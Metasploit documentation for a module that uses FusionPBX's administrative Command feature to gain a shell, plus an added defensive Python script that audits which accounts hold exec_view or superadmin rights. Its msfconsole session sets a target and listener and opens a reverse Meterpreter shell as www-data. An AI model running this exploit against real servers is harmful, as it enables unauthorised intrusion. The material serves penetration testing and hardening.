metasploit-gs/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md
2019-11-02 22:37:56 +00:00


Description

This module uses administrative functionality available in FusionPBX to gain a shell.

The Command section of the application permits users with exec_view permissions, or superadmin permissions, to execute arbitrary system commands, or arbitrary PHP code, as the web server user.
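An added example, not part of the module or the FusionPBX project: a defensive audit that lists which accounts can reach the Command section under the rule described above (exec_view or superadmin). The CSV layout, the sample users and groups, and the modelling of superadmin as a group are assumptions, and the data is constructed.

```python
import csv
import io

# Constructed sample exports (assumed CSV layout, not FusionPBX's own schema).
GROUP_PERMISSIONS = """group,permission
superadmin,exec_view
admin,user_view
support,exec_view
agent,call_view
"""

USER_GROUPS = """username,group
admin,superadmin
alice,admin
bob,support
carol,agent
dave,support
dave,agent
"""

EXEC_PERMISSION = "exec_view"    # permission named in the module description
SUPERADMIN_GROUP = "superadmin"  # assumption: superadmin is modelled as a group
DEFAULT_USERNAME = "admin"       # the module's USERNAME default


def command_capable_users(group_permissions_csv, user_groups_csv):
    """Return {username: sorted reasons} for accounts able to run commands."""
    # Groups that grant access: superadmin always, plus any group with exec_view.
    exec_groups = {SUPERADMIN_GROUP}
    for row in csv.DictReader(io.StringIO(group_permissions_csv)):
        if row["permission"].strip() == EXEC_PERMISSION:
            exec_groups.add(row["group"].strip())

    findings = {}
    for row in csv.DictReader(io.StringIO(user_groups_csv)):
        user, group = row["username"].strip(), row["group"].strip()
        if group in exec_groups:
            findings.setdefault(user, set()).add(f"member of {group}")
    # A command-capable account that still uses the default name is worth flagging.
    for user, reasons in findings.items():
        if user == DEFAULT_USERNAME:
            reasons.add("default username")
    return {user: sorted(reasons) for user, reasons in findings.items()}


if __name__ == "__main__":
    report = command_capable_users(GROUP_PERMISSIONS, USER_GROUPS)
    for user, reasons in sorted(report.items()):
        print(f"{user}: {', '.join(reasons)}")
```

Every account the audit returns can execute commands as the web server user, so the list should be limited to the few administrators who need the feature.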

Vulnerable Software

This module has been tested successfully on FusionPBX version 4.4.1 on Ubuntu 19.04 (x64).

Software:

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/unix/webapp/fusionpbx_exec_cmd_exec
  3. Do: set rhosts <IP>
  4. Do: set username <username> (default: admin)
  5. Do: set password <password>
  6. Do: run
  7. You should get a new session

Options

TARGETURI

The base path to FusionPBX (default: /)

USERNAME

The username for FusionPBX (default: admin)

PASSWORD

The password for FusionPBX

Scenarios

msf5 > use exploit/unix/webapp/fusionpbx_exec_cmd_exec 
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214
rhosts => 172.16.191.214
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin
username => admin
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc
password => PXRtwZqSkvToC4gc
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165 
lhost => 172.16.191.165
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)
   1   Automatic (Unix In-Memory)
   2   Automatic (Linux Dropper)


msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] Authenticated as user 'admin'
[*] Sending payload (1115 bytes) ...
[*] Sending stage (38288 bytes) to 172.16.191.214
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.214:60772) at 2019-11-01 19:25:43 -0400

meterpreter > getuid
Server username: www-data (33)
meterpreter >